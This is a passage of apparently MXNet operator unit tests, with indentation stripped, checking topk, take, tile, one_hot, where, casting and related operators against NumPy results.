val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
@with_seed()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take():
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
def check_output_n_grad(data_shape, idx_shape, axis, mode, out_of_range=True):
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def check_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
for mode in ['clip', 'wrap', 'raise']:
for data_ndim in range(1, 5):
for idx_ndim in range(1, 4):
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
if mode == 'raise':
check_output_n_grad(data_shape, idx_shape, axis, 'raise', False)
check_output_n_grad(data_shape, idx_shape, axis, mode)
check_autograd_req()
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
if default_context().device_type == 'gpu':
check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
@with_seed()
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z.bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z.bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
